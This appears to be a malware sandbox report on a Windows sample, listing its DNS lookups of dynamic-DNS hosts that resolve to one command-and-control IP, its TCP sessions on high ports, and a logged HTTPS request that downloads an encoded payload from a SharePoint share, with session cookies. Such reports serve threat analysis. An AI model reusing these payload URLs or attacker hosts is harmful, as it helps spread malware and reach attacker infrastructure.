                                                                      Nov 26, 2024 08:15:54.616734028 CET4983013939192.168.2.9103.186.117.159
                                                                      Nov 26, 2024 08:15:54.647855997 CET4983013939192.168.2.9103.186.117.159
                                                                      Nov 26, 2024 08:15:54.767849922 CET1393949830103.186.117.159192.168.2.9
                                                                      Nov 26, 2024 08:16:16.567248106 CET1393949830103.186.117.159192.168.2.9
                                                                      Nov 26, 2024 08:16:16.567389965 CET4983013939192.168.2.9103.186.117.159
                                                                      Nov 26, 2024 08:16:16.567445993 CET4983013939192.168.2.9103.186.117.159
                                                                      Nov 26, 2024 08:16:16.687678099 CET1393949830103.186.117.159192.168.2.9
                                                                      Nov 26, 2024 08:16:19.202837944 CET4983156796192.168.2.9103.186.117.159
                                                                      Nov 26, 2024 08:16:19.322972059 CET5679649831103.186.117.159192.168.2.9
                                                                      Nov 26, 2024 08:16:19.323245049 CET4983156796192.168.2.9103.186.117.159
                                                                      Nov 26, 2024 08:16:19.326312065 CET4983156796192.168.2.9103.186.117.159
                                                                      Nov 26, 2024 08:16:19.446484089 CET5679649831103.186.117.159192.168.2.9

                                                                      UDP Packets

                                                                      TimestampSource PortDest PortSource IPDest IP
                                                                      Nov 26, 2024 08:12:11.334064960 CET5130153192.168.2.91.1.1.1
                                                                      Nov 26, 2024 08:12:19.968487024 CET5981153192.168.2.91.1.1.1
                                                                      Nov 26, 2024 08:12:20.395488977 CET53598111.1.1.1192.168.2.9
                                                                      Nov 26, 2024 08:12:28.738857031 CET5501753192.168.2.91.1.1.1
                                                                      Nov 26, 2024 08:12:29.074512959 CET53550171.1.1.1192.168.2.9
                                                                      Nov 26, 2024 08:12:41.249989033 CET5240553192.168.2.91.1.1.1
                                                                      Nov 26, 2024 08:12:41.401722908 CET53524051.1.1.1192.168.2.9
                                                                      Nov 26, 2024 08:12:51.162787914 CET6236053192.168.2.91.1.1.1
                                                                      Nov 26, 2024 08:12:51.397284985 CET53623601.1.1.1192.168.2.9
                                                                      Nov 26, 2024 08:12:51.422683001 CET5211553192.168.2.91.1.1.1
                                                                      Nov 26, 2024 08:12:51.738557100 CET53521151.1.1.1192.168.2.9
                                                                      Nov 26, 2024 08:13:37.109226942 CET5024953192.168.2.91.1.1.1
                                                                      Nov 26, 2024 08:13:37.249089956 CET53502491.1.1.1192.168.2.9
                                                                      Nov 26, 2024 08:14:22.400125027 CET5511553192.168.2.91.1.1.1
                                                                      Nov 26, 2024 08:14:22.631006002 CET53551151.1.1.1192.168.2.9
                                                                      Nov 26, 2024 08:14:22.632741928 CET6508153192.168.2.91.1.1.1
                                                                      Nov 26, 2024 08:14:22.956145048 CET53650811.1.1.1192.168.2.9
                                                                      Nov 26, 2024 08:14:46.030692101 CET5426153192.168.2.91.1.1.1
                                                                      Nov 26, 2024 08:14:46.171729088 CET53542611.1.1.1192.168.2.9
                                                                      Nov 26, 2024 08:15:08.285502911 CET5191253192.168.2.91.1.1.1
                                                                      Nov 26, 2024 08:15:08.428000927 CET53519121.1.1.1192.168.2.9
                                                                      Nov 26, 2024 08:15:31.484304905 CET6205153192.168.2.91.1.1.1
                                                                      Nov 26, 2024 08:15:31.866789103 CET53620511.1.1.1192.168.2.9
                                                                      Nov 26, 2024 08:15:53.928049088 CET5961853192.168.2.91.1.1.1
                                                                      Nov 26, 2024 08:15:54.157521009 CET53596181.1.1.1192.168.2.9
                                                                      Nov 26, 2024 08:15:54.160147905 CET5179353192.168.2.91.1.1.1
                                                                      Nov 26, 2024 08:15:54.466357946 CET53517931.1.1.1192.168.2.9

                                                                      DNS Queries

                                                                      TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                      Nov 26, 2024 08:12:11.334064960 CET192.168.2.91.1.1.10x5724Standard query (0)alfanar01-my.sharepoint.comA (IP address)IN (0x0001)false
                                                                      Nov 26, 2024 08:12:19.968487024 CET192.168.2.91.1.1.10xd48cStandard query (0)lightstone.aeA (IP address)IN (0x0001)false
                                                                      Nov 26, 2024 08:12:28.738857031 CET192.168.2.91.1.1.10x55aaStandard query (0)pentester0.accesscam.orgA (IP address)IN (0x0001)false
                                                                      Nov 26, 2024 08:12:41.249989033 CET192.168.2.91.1.1.10xfbd8Standard query (0)pentester0.accesscam.orgA (IP address)IN (0x0001)false
                                                                      Nov 26, 2024 08:12:51.162787914 CET192.168.2.91.1.1.10x1c19Standard query (0)archived.zapto.orgA (IP address)IN (0x0001)false
                                                                      Nov 26, 2024 08:12:51.422683001 CET192.168.2.91.1.1.10x48eeStandard query (0)honeypotresearchteam.duckdns.orgA (IP address)IN (0x0001)false
                                                                      Nov 26, 2024 08:13:37.109226942 CET192.168.2.91.1.1.10x8807Standard query (0)archived.zapto.orgA (IP address)IN (0x0001)false
                                                                      Nov 26, 2024 08:14:22.400125027 CET192.168.2.91.1.1.10xf772Standard query (0)archived.zapto.orgA (IP address)IN (0x0001)false
                                                                      Nov 26, 2024 08:14:22.632741928 CET192.168.2.91.1.1.10x82a8Standard query (0)honeypotresearchteam.duckdns.orgA (IP address)IN (0x0001)false
                                                                      Nov 26, 2024 08:14:46.030692101 CET192.168.2.91.1.1.10x7185Standard query (0)pentester0.accesscam.orgA (IP address)IN (0x0001)false
                                                                      Nov 26, 2024 08:15:08.285502911 CET192.168.2.91.1.1.10x4be6Standard query (0)archived.zapto.orgA (IP address)IN (0x0001)false
                                                                      Nov 26, 2024 08:15:31.484304905 CET192.168.2.91.1.1.10x766bStandard query (0)pentester0.accesscam.orgA (IP address)IN (0x0001)false
                                                                      Nov 26, 2024 08:15:53.928049088 CET192.168.2.91.1.1.10x63ceStandard query (0)archived.zapto.orgA (IP address)IN (0x0001)false
                                                                      Nov 26, 2024 08:15:54.160147905 CET192.168.2.91.1.1.10x66d5Standard query (0)honeypotresearchteam.duckdns.orgA (IP address)IN (0x0001)false

                                                                      DNS Answers

                                                                      TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                      Nov 26, 2024 08:12:12.122469902 CET1.1.1.1192.168.2.90x5724No error (0)alfanar01-my.sharepoint.comalfanar01.sharepoint.comCNAME (Canonical name)IN (0x0001)false
                                                                      Nov 26, 2024 08:12:12.122469902 CET1.1.1.1192.168.2.90x5724No error (0)alfanar01.sharepoint.com13828-ipv4v6e.clump.dprodmgd104.aa-rt.sharepoint.comCNAME (Canonical name)IN (0x0001)false
                                                                      Nov 26, 2024 08:12:12.122469902 CET1.1.1.1192.168.2.90x5724No error (0)13828-ipv4v6e.clump.dprodmgd104.aa-rt.sharepoint.com189749-ipv4v6e.farm.dprodmgd104.aa-rt.sharepoint.comCNAME (Canonical name)IN (0x0001)false
                                                                      Nov 26, 2024 08:12:12.122469902 CET1.1.1.1192.168.2.90x5724No error (0)189749-ipv4v6e.farm.dprodmgd104.aa-rt.sharepoint.com189749-ipv4v6e.farm.dprodmgd104.sharepointonline.com.akadns.netCNAME (Canonical name)IN (0x0001)false
                                                                      Nov 26, 2024 08:12:12.122469902 CET1.1.1.1192.168.2.90x5724No error (0)189749-ipv4v6.farm.dprodmgd104.aa-rt.sharepoint.com.dual-spo-0005.spo-msedge.netdual-spo-0005.spo-msedge.netCNAME (Canonical name)IN (0x0001)false
                                                                      Nov 26, 2024 08:12:12.122469902 CET1.1.1.1192.168.2.90x5724No error (0)dual-spo-0005.spo-msedge.net13.107.136.10A (IP address)IN (0x0001)false
                                                                      Nov 26, 2024 08:12:12.122469902 CET1.1.1.1192.168.2.90x5724No error (0)dual-spo-0005.spo-msedge.net13.107.138.10A (IP address)IN (0x0001)false
                                                                      Nov 26, 2024 08:12:20.395488977 CET1.1.1.1192.168.2.90xd48cNo error (0)lightstone.ae162.19.139.102A (IP address)IN (0x0001)false
                                                                      Nov 26, 2024 08:12:29.074512959 CET1.1.1.1192.168.2.90x55aaNo error (0)pentester0.accesscam.org103.186.117.159A (IP address)IN (0x0001)false
                                                                      Nov 26, 2024 08:12:41.401722908 CET1.1.1.1192.168.2.90xfbd8No error (0)pentester0.accesscam.org103.186.117.159A (IP address)IN (0x0001)false
                                                                      Nov 26, 2024 08:12:51.738557100 CET1.1.1.1192.168.2.90x48eeNo error (0)honeypotresearchteam.duckdns.org103.186.117.159A (IP address)IN (0x0001)false
                                                                      Nov 26, 2024 08:14:22.956145048 CET1.1.1.1192.168.2.90x82a8No error (0)honeypotresearchteam.duckdns.org103.186.117.159A (IP address)IN (0x0001)false
                                                                      Nov 26, 2024 08:14:46.171729088 CET1.1.1.1192.168.2.90x7185No error (0)pentester0.accesscam.org103.186.117.159A (IP address)IN (0x0001)false
                                                                      Nov 26, 2024 08:15:31.866789103 CET1.1.1.1192.168.2.90x766bNo error (0)pentester0.accesscam.org103.186.117.159A (IP address)IN (0x0001)false
                                                                      Nov 26, 2024 08:15:54.466357946 CET1.1.1.1192.168.2.90x66d5No error (0)honeypotresearchteam.duckdns.org103.186.117.159A (IP address)IN (0x0001)false

                                                                      HTTP Request Dependency Graph

                                                                      • alfanar01-my.sharepoint.com
                                                                      • lightstone.ae

                                                                      HTTPS Proxied Packets

                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                      0192.168.2.94972313.107.136.104437280C:\Users\user\Desktop\jlPBMMQbXC.exe
                                                                      TimestampBytes transferredDirectionData
                                                                      2024-11-26 07:12:14 UTC265OUTGET /:u:/g/personal/huzaifa_alfanargas_com/EbcBi98Fae9PrYH7LpmiSQMBlKcC8bPaqfGiqmGYrLTf6w?e=8qbxqz&download=1 HTTP/1.1
                                                                      Connection: Keep-Alive
                                                                      Accept: */*
                                                                      User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                                                                      Host: alfanar01-my.sharepoint.com
                                                                      2024-11-26 07:12:15 UTC3663INHTTP/1.1 302 Found
                                                                      Cache-Control: private
                                                                      Content-Length: 180
                                                                      Content-Type: text/html; charset=utf-8
                                                                      Location: /personal/huzaifa_alfanargas_com/Documents/233_Selebzihtih?ga=1
                                                                      P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
                                                                      Set-Cookie: FedAuth=77u/PD94bWwgdmVyc2lvbj0iMS4wIiBlbmNvZGluZz0idXRmLTgiPz48U1A+VjEzLDBoLmZ8bWVtYmVyc2hpcHx1cm4lM2FzcG8lM2Fhbm9uI2Q3NzQ2ZGY2NmVlODk4Nzc5MTI0YzAxMTEwNWZkZTJlZTgyZTI3NTUzNGMwNmMyMjBiOWNlZjQyNGMxNzNjMzAsMCMuZnxtZW1iZXJzaGlwfHVybiUzYXNwbyUzYWFub24jZDc3NDZkZjY2ZWU4OTg3NzkxMjRjMDExMTA1ZmRlMmVlODJlMjc1NTM0YzA2YzIyMGI5Y2VmNDI0YzE3M2MzMCwxMzM3NzA3OTAzNDAwMDAwMDAsMCwxMzM3NzE2NTEzNDk3ODEzMTksMC4wLjAuMCwyNTgsOTE3NDIwNjMtZmNjYy00Y2JhLWIzNGItNjliZTU0ZTQ4NGU4LCwsZDE5NzY3YTEtNzBmOS1hMDAwLTcwZGMtNmI4OGUwYmM1NThkLGQxOTc2N2ExLTcwZjktYTAwMC03MGRjLTZiODhlMGJjNTU4ZCxMMEhrZGdUY3pVcTFOaGcwM2VZM2ZRLDAsMCwwLCwsLDI2NTA0Njc3NDM5OTk5OTk5OTksMCwsLCwsLCwwLCwxODk3NDksdVhlaFFKUGxlVmpOQ2Jha1VoR0Q2SXlGUVFrLGlQNFZYR2cwTkFVRFJwaHJxS0ZTK1ZDM3RFT0dkTnVqeWhZaGRkNm4yMVJqVUxIYjVQUE9QQkY3SkgyczF3cWZtU0RrTWQzanV2My82RzlEWTRrdE9vbzQ0VnAvb085WE1iL2ExSnBJWVBieHFab3Z4bm9tSk5YVWYwK0Vwd3VHU2pzOEROSitPOExnUGlYeGtYV2hLMGY0YTNpZXRqOUJNTWJTWXJiYXBJc0pMZEk0YlI2MXhFZjhvK242TmJZM0s0VmNXOEJ0Sk5MZzhpZEJIQVdFOVlFZVhKY3pZMk1OQkpHcElMRzcvczFRODVla09MUVVa [TRUNCATED]
                                                                      X-NetworkStatistics: 0,525568,0,0,140,0,26331,60
                                                                      X-SharePointHealthScore: 1
                                                                      X-MS-SPO-CookieValidator: iP4VXGg0NAUDRphrqKFS+VC3tEOGdNujyhYhdd6n21RjULHb5PPOPBF7JH2s1wqfmSDkMd3juv3/6G9DY4ktOoo44Vp/oO9XMb/a1JpIYPbxqZovxnomJNXUf0+EpwuGSjs8DNJ+O8LgPiXxkXWhK0f4a3ietj9BMMbSYrbapIsJLdI4bR61xEf8o+n6NbY3K4VcW8BtJNLg8idBHAWE9YEeXJczY2MNBJGpILG7/s1Q85ekOLQUZr09Nig9F8bR1F/E7YPWSYrlDxpc+HpMYgbFzpDDB42BvANtaEKt0HSI/BDIQ1x6ceGgA2CojNHB8xhV2vO1N9YmighH5ndVnQ==
                                                                      X-AspNet-Version: 4.0.30319
                                                                      X-DataBoundary: EU
                                                                      X-1DSCollectorUrl: https://eu-mobile.events.data.microsoft.com/OneCollector/1.0/
                                                                      X-AriaCollectorURL: https://eu-mobile.events.data.microsoft.com/Collector/3.0
                                                                      SPRequestGuid: d19767a1-70f9-a000-70dc-6b88e0bc558d
                                                                      request-id: d19767a1-70f9-a000-70dc-6b88e0bc558d
                                                                      MS-CV: oWeX0flwAKBw3GuI4LxVjQ.0
                                                                      Alt-Svc: h3=":443";ma=86400
                                                                      Report-To: {"group":"network-errors","max_age":7200,"endpoints":[{"url":"https://spo.nel.measure.office.net/api/report?tenantId=91742063-fccc-4cba-b34b-69be54e484e8&desusertionEndpoint=Edge-Prod-EWR31r5c&frontEnd=AFD&RemoteIP=8.46.123.0"}]}
                                                                      NEL: {"report_to":"network-errors","max_age":7200,"success_fraction":0.001,"failure_fraction":1.0}
                                                                      Strict-Transport-Security: max-age=31536000
                                                                      X-FRAME-OPTIONS: SAMEORIGIN
                                                                      Content-Security-Policy: frame-ancestors 'self' teams.microsoft.com *.teams.microsoft.com *.skype.com *.teams.microsoft.us local.teams.office.com teams.cloud.microsoft *.office365.com goals.cloud.microsoft *.powerapps.com app.powerbi.com *.yammer.com engage.cloud.microsoft word.cloud.microsoft excel.cloud.microsoft powerpoint.cloud.microsoft *.officeapps.live.com *.office.com *.microsoft365.com *.stream.azure-test.net *.microsoftstream.com *.dynamics.com *.microsoft.com onedrive.live.com *.onedrive.live.com securebroker.sharepointonline.com;
                                                                      SPRequestDuration: 269
                                                                      SPIisLatency: 4
                                                                      X-Powered-By: ASP.NET
                                                                      MicrosoftSharePointTeamServices: 16.0.0.25430
                                                                      X-Content-Type-Options: nosniff
                                                                      X-MS-InvokeApp: 1; RequireReadOnly
                                                                      X-Cache: CONFIG_NOCACHE
                                                                      X-MSEdge-Ref: Ref A: 05748EF33E884D8AAFC9C39AD45AA39D Ref B: EWR311000105037 Ref C: 2024-11-26T07:12:14Z
                                                                      Date: Tue, 26 Nov 2024 07:12:14 GMT
                                                                      Connection: close
                                                                      2024-11-26 07:12:15 UTC180INData Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 4f 62 6a 65 63 74 20 6d 6f 76 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 32 3e 4f 62 6a 65 63 74 20 6d 6f 76 65 64 20 74 6f 20 3c 61 20 68 72 65 66 3d 22 2f 70 65 72 73 6f 6e 61 6c 2f 68 75 7a 61 69 66 61 5f 61 6c 66 61 6e 61 72 67 61 73 5f 63 6f 6d 2f 44 6f 63 75 6d 65 6e 74 73 2f 32 33 33 5f 53 65 6c 65 62 7a 69 68 74 69 68 3f 67 61 3d 31 22 3e 68 65 72 65 3c 2f 61 3e 2e 3c 2f 68 32 3e 0d 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                      Data Ascii: <html><head><title>Object moved</title></head><body><h2>Object moved to <a href="/personal/huzaifa_alfanargas_com/Documents/233_Selebzihtih?ga=1">here</a>.</h2></body></html>


                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                      1192.168.2.94972913.107.136.104437280C:\Users\user\Desktop\jlPBMMQbXC.exe
                                                                      TimestampBytes transferredDirectionData
                                                                      2024-11-26 07:12:16 UTC1385OUTGET /personal/huzaifa_alfanargas_com/Documents/233_Selebzihtih?ga=1 HTTP/1.1
                                                                      Connection: Keep-Alive
                                                                      Accept: */*
                                                                      User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                                                                      Host: alfanar01-my.sharepoint.com
                                                                      Cookie: FedAuth=77u/PD94bWwgdmVyc2lvbj0iMS4wIiBlbmNvZGluZz0idXRmLTgiPz48U1A+VjEzLDBoLmZ8bWVtYmVyc2hpcHx1cm4lM2FzcG8lM2Fhbm9uI2Q3NzQ2ZGY2NmVlODk4Nzc5MTI0YzAxMTEwNWZkZTJlZTgyZTI3NTUzNGMwNmMyMjBiOWNlZjQyNGMxNzNjMzAsMCMuZnxtZW1iZXJzaGlwfHVybiUzYXNwbyUzYWFub24jZDc3NDZkZjY2ZWU4OTg3NzkxMjRjMDExMTA1ZmRlMmVlODJlMjc1NTM0YzA2YzIyMGI5Y2VmNDI0YzE3M2MzMCwxMzM3NzA3OTAzNDAwMDAwMDAsMCwxMzM3NzE2NTEzNDk3ODEzMTksMC4wLjAuMCwyNTgsOTE3NDIwNjMtZmNjYy00Y2JhLWIzNGItNjliZTU0ZTQ4NGU4LCwsZDE5NzY3YTEtNzBmOS1hMDAwLTcwZGMtNmI4OGUwYmM1NThkLGQxOTc2N2ExLTcwZjktYTAwMC03MGRjLTZiODhlMGJjNTU4ZCxMMEhrZGdUY3pVcTFOaGcwM2VZM2ZRLDAsMCwwLCwsLDI2NTA0Njc3NDM5OTk5OTk5OTksMCwsLCwsLCwwLCwxODk3NDksdVhlaFFKUGxlVmpOQ2Jha1VoR0Q2SXlGUVFrLGlQNFZYR2cwTkFVRFJwaHJxS0ZTK1ZDM3RFT0dkTnVqeWhZaGRkNm4yMVJqVUxIYjVQUE9QQkY3SkgyczF3cWZtU0RrTWQzanV2My82RzlEWTRrdE9vbzQ0VnAvb085WE1iL2ExSnBJWVBieHFab3Z4bm9tSk5YVWYwK0Vwd3VHU2pzOEROSitPOExnUGlYeGtYV2hLMGY0YTNpZXRqOUJNTWJTWXJiYXBJc0pMZEk0YlI2MXhFZjhvK242TmJZM0s0VmNXOEJ0Sk5MZzhpZEJIQVdFOVlFZVhKY3pZMk1OQkpHcElMRzcvczFRODVla09MUVVacjA5 [TRUNCATED]
                                                                      2024-11-26 07:12:17 UTC4809INHTTP/1.1 200 OK
                                                                      Cache-Control: private,max-age=0
                                                                      Content-Length: 1072224
                                                                      Content-Type: application/octet-stream
                                                                      Expires: Mon, 11 Nov 2024 07:12:17 GMT
                                                                      Last-Modified: Mon, 16 Sep 2024 04:41:15 GMT
                                                                      Accept-Ranges: bytes
                                                                      ETag: "{DF8B01B7-6905-4FEF-AD81-FB2E99A24903},2"
                                                                      P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
                                                                      Set-Cookie: FedAuth=77u/PD94bWwgdmVyc2lvbj0iMS4wIiBlbmNvZGluZz0idXRmLTgiPz48U1A+VjEzLDBoLmZ8bWVtYmVyc2hpcHx1cm4lM2FzcG8lM2Fhbm9uI2Q3NzQ2ZGY2NmVlODk4Nzc5MTI0YzAxMTEwNWZkZTJlZTgyZTI3NTUzNGMwNmMyMjBiOWNlZjQyNGMxNzNjMzAsMCMuZnxtZW1iZXJzaGlwfHVybiUzYXNwbyUzYWFub24jZDc3NDZkZjY2ZWU4OTg3NzkxMjRjMDExMTA1ZmRlMmVlODJlMjc1NTM0YzA2YzIyMGI5Y2VmNDI0YzE3M2MzMCwxMzM3NzA3OTAzNDAwMDAwMDAsMCwxMzM3NzE2NTEzNDk3ODEzMTksMC4wLjAuMCwyNTgsOTE3NDIwNjMtZmNjYy00Y2JhLWIzNGItNjliZTU0ZTQ4NGU4LCwsZDE5NzY3YTEtNzBmOS1hMDAwLTcwZGMtNmI4OGUwYmM1NThkLGQxOTc2N2ExLTcwZjktYTAwMC03MGRjLTZiODhlMGJjNTU4ZCxMMEhrZGdUY3pVcTFOaGcwM2VZM2ZRLDAsMCwwLCwsLDI2NTA0Njc3NDM5OTk5OTk5OTksMCwsLCwsLCwwLCwxODk3NDksdVhlaFFKUGxlVmpOQ2Jha1VoR0Q2SXlGUVFrLGlQNFZYR2cwTkFVRFJwaHJxS0ZTK1ZDM3RFT0dkTnVqeWhZaGRkNm4yMVJqVUxIYjVQUE9QQkY3SkgyczF3cWZtU0RrTWQzanV2My82RzlEWTRrdE9vbzQ0VnAvb085WE1iL2ExSnBJWVBieHFab3Z4bm9tSk5YVWYwK0Vwd3VHU2pzOEROSitPOExnUGlYeGtYV2hLMGY0YTNpZXRqOUJNTWJTWXJiYXBJc0pMZEk0YlI2MXhFZjhvK242TmJZM0s0VmNXOEJ0Sk5MZzhpZEJIQVdFOVlFZVhKY3pZMk1OQkpHcElMRzcvczFRODVla09MUVVa [TRUNCATED]
                                                                      Set-Cookie: FedAuth=77u/PD94bWwgdmVyc2lvbj0iMS4wIiBlbmNvZGluZz0idXRmLTgiPz48U1A+VjEzLDBoLmZ8bWVtYmVyc2hpcHx1cm4lM2FzcG8lM2Fhbm9uI2Q3NzQ2ZGY2NmVlODk4Nzc5MTI0YzAxMTEwNWZkZTJlZTgyZTI3NTUzNGMwNmMyMjBiOWNlZjQyNGMxNzNjMzAsMCMuZnxtZW1iZXJzaGlwfHVybiUzYXNwbyUzYWFub24jZDc3NDZkZjY2ZWU4OTg3NzkxMjRjMDExMTA1ZmRlMmVlODJlMjc1NTM0YzA2YzIyMGI5Y2VmNDI0YzE3M2MzMCwxMzM3NzA3OTAzNDAwMDAwMDAsMCwxMzM3NzE2NTEzNDk3ODEzMTksMC4wLjAuMCwyNTgsOTE3NDIwNjMtZmNjYy00Y2JhLWIzNGItNjliZTU0ZTQ4NGU4LCwsZDE5NzY3YTEtNzBmOS1hMDAwLTcwZGMtNmI4OGUwYmM1NThkLGQxOTc2N2ExLTcwZjktYTAwMC03MGRjLTZiODhlMGJjNTU4ZCxMMEhrZGdUY3pVcTFOaGcwM2VZM2ZRLDAsMCwwLCwsLDI2NTA0Njc3NDM5OTk5OTk5OTksMCwsLCwsLCwwLCwxODk3NDksdVhlaFFKUGxlVmpOQ2Jha1VoR0Q2SXlGUVFrLGlQNFZYR2cwTkFVRFJwaHJxS0ZTK1ZDM3RFT0dkTnVqeWhZaGRkNm4yMVJqVUxIYjVQUE9QQkY3SkgyczF3cWZtU0RrTWQzanV2My82RzlEWTRrdE9vbzQ0VnAvb085WE1iL2ExSnBJWVBieHFab3Z4bm9tSk5YVWYwK0Vwd3VHU2pzOEROSitPOExnUGlYeGtYV2hLMGY0YTNpZXRqOUJNTWJTWXJiYXBJc0pMZEk0YlI2MXhFZjhvK242TmJZM0s0VmNXOEJ0Sk5MZzhpZEJIQVdFOVlFZVhKY3pZMk1OQkpHcElMRzcvczFRODVla09MUVVa [TRUNCATED]
                                                                      X-NetworkStatistics: 0,525568,0,0,138,0,26343,60
                                                                      X-SharePointHealthScore: 3
                                                                      ResourceTag: rt:DF8B01B7-6905-4FEF-AD81-FB2E99A24903@00000000002
                                                                      Content-Disposition: attachment; filename*=utf-8''233%5fSelebzihtih; filename="233_Selebzihtih"
                                                                      X-Download-Options: noopen
                                                                      Public-Extension: http://schemas.microsoft.com/repl-2
                                                                      X-DataBoundary: EU
                                                                      X-1DSCollectorUrl: https://eu-mobile.events.data.microsoft.com/OneCollector/1.0/
                                                                      X-AriaCollectorURL: https://eu-mobile.events.data.microsoft.com/Collector/3.0
                                                                      SPRequestGuid: d29767a1-8095-a000-c2b2-b5b965e43a56
                                                                      request-id: d29767a1-8095-a000-c2b2-b5b965e43a56
                                                                      MS-CV: oWeX0pWAAKDCsrW5ZeQ6Vg.0
                                                                      Alt-Svc: h3=":443";ma=86400
                                                                      Report-To: {"group":"network-errors","max_age":7200,"endpoints":[{"url":"https://spo.nel.measure.office.net/api/report?tenantId=91742063-fccc-4cba-b34b-69be54e484e8&desusertionEndpoint=Edge-Prod-EWR31r5b&frontEnd=AFD&RemoteIP=8.46.123.0"}]}
                                                                      NEL: {"report_to":"network-errors","max_age":7200,"success_fraction":0.001,"failure_fraction":1.0}
                                                                      Strict-Transport-Security: max-age=31536000
                                                                      X-FRAME-OPTIONS: SAMEORIGIN
                                                                      Content-Security-Policy: frame-ancestors 'self' teams.microsoft.com *.teams.microsoft.com *.skype.com *.teams.microsoft.us local.teams.office.com teams.cloud.microsoft *.office365.com goals.cloud.microsoft *.powerapps.com app.powerbi.com *.yammer.com engage.cloud.microsoft word.cloud.microsoft excel.cloud.microsoft powerpoint.cloud.microsoft *.officeapps.live.com *.office.com *.microsoft365.com *.stream.azure-test.net *.microsoftstream.com *.dynamics.com *.microsoft.com onedrive.live.com *.onedrive.live.com securebroker.sharepointonline.com;
                                                                      SPRequestDuration: 390
                                                                      SPIisLatency: 1
                                                                      X-Powered-By: ASP.NET
                                                                      MicrosoftSharePointTeamServices: 16.0.0.25430
                                                                      X-Content-Type-Options: nosniff
                                                                      X-MS-InvokeApp: 1; RequireReadOnly
                                                                      X-Cache: CONFIG_NOCACHE
                                                                      X-MSEdge-Ref: Ref A: 662CC01130A04806A28BD6E7207688DF Ref B: EWR311000104033 Ref C: 2024-11-26T07:12:17Z
                                                                      Date: Tue, 26 Nov 2024 07:12:17 GMT
                                                                      Connection: close
                                                                      2024-11-26 07:12:17 UTC3409INData Raw: 70 71 36 6c 57 53 4f 6e 73 55 73 53 49 41 34 6c 45 68 77 6e 47 68 55 68 4a 78 6f 66 48 69 55 64 47 41 38 57 48 42 30 54 45 42 4d 53 47 53 59 6a 4a 42 6b 55 46 67 38 56 44 79 49 5a 4a 78 38 58 46 68 73 4f 47 52 51 65 48 68 6f 61 44 79 63 56 46 52 59 64 47 69 41 4f 45 42 45 57 49 42 4d 53 4a 52 41 6d 44 68 34 55 45 78 6b 6c 45 52 51 58 45 68 49 51 49 51 34 63 4a 77 34 6e 48 42 77 58 70 71 36 6c 57 53 4f 6e 73 55 73 41 45 68 6b 53 44 79 63 57 46 53 45 57 46 61 61 75 70 56 6b 6a 70 37 46 4c 76 64 50 42 32 4c 33 48 32 73 58 49 7a 4e 72 46 30 74 48 59 30 4d 76 43 79 63 66 51 76 73 4f 2b 76 63 54 5a 7a 73 2f 45 76 38 6e 43 79 4d 4c 4e 78 4e 72 53 79 73 6e 47 77 63 53 2f 30 64 48 46 78 63 4c 61 79 4d 6a 4a 30 4d 58 54 77 63 4f 38 79 64 4f 2b 76 64 6a 44 32 63 48
                                                                      Data Ascii: pq6lWSOnsUsSIA4lEhwnGhUhJxofHiUdGA8WHB0TEBMSGSYjJBkUFg8VDyIZJx8XFhsOGRQeHhoaDycVFRYdGiAOEBEWIBMSJRAmDh4UExklERQXEhIQIQ4cJw4nHBwXpq6lWSOnsUsAEhkSDycWFSEWFaaupVkjp7FLvdPB2L3H2sXIzNrF0tHY0MvCycfQvsO+vcTZzs/Ev8nCyMLNxNrSysnGwcS/0dHFxcLayMjJ0MXTwcO8ydO+vdjD2cH
                                                                      2024-11-26 07:12:17 UTC8192INData Raw: 68 70 70 55 36 4f 64 6d 2f 35 32 35 76 66 2b 48 61 2f 58 41 35 44 70 59 56 6e 52 4d 32 35 5a 45 57 2b 4d 56 36 64 68 70 2f 34 4c 49 65 68 54 44 69 49 64 55 47 4c 2f 53 6c 45 75 4b 4c 39 4c 74 36 6a 49 44 50 41 5a 62 46 45 36 73 6c 49 43 78 71 51 42 41 54 36 2b 66 58 68 36 49 68 61 49 44 6f 4c 43 63 77 56 48 4f 6f 66 69 6d 34 52 31 38 61 33 43 6b 35 32 6e 34 57 39 4a 37 4b 42 66 4a 2f 62 5a 6b 6e 74 78 2b 47 4b 6e 38 48 78 31 55 76 31 4a 65 50 39 4c 70 5a 74 69 48 65 52 78 49 49 54 74 64 38 76 6d 70 33 4a 65 77 4d 38 4e 79 45 42 34 4a 4e 4a 75 6b 76 4e 46 74 68 30 6e 5a 50 4b 53 45 30 56 4e 6b 52 31 77 34 74 41 64 6f 64 70 33 36 65 39 41 47 69 51 52 43 49 48 6b 69 42 77 6c 36 75 44 4e 69 68 61 65 31 4f 66 6f 31 39 53 63 39 35 55 2b 2f 52 61 69 55 56 30 56
                                                                      Data Ascii: hppU6Odm/525vf+Ha/XA5DpYVnRM25ZEW+MV6dhp/4LIehTDiIdUGL/SlEuKL9Lt6jIDPAZbFE6slICxqQBAT6+fXh6IhaIDoLCcwVHOofim4R18a3Ck52n4W9J7KBfJ/bZkntx+GKn8Hx1Uv1JeP9LpZtiHeRxIITtd8vmp3JewM8NyEB4JNJukvNFth0nZPKSE0VNkR1w4tAdodp36e9AGiQRCIHkiBwl6uDNihae1Ofo19Sc95U+/RaiUV0V
                                                                      2024-11-26 07:12:17 UTC96INData Raw: 39 4e 51 41 51 6d 41 4d 66 2b 43 34 48 30 45 4c 51 66 6b 7a 63 53 64 61 38 58 52 67 42 66 4f 61 56 65 4e 7a 79 78 68 56 39 4b 76 63 46 6d 54 57 72 37 59 38 77 77 62 61 6e 79 49 41 74 58 6d 35 54 71 6e 57 76 77 37 74 30 33 61 2f 43 47 52 64 2b 55 70 64 57 4f 34 4e 57 62 2b 6c 72 2f 63 41
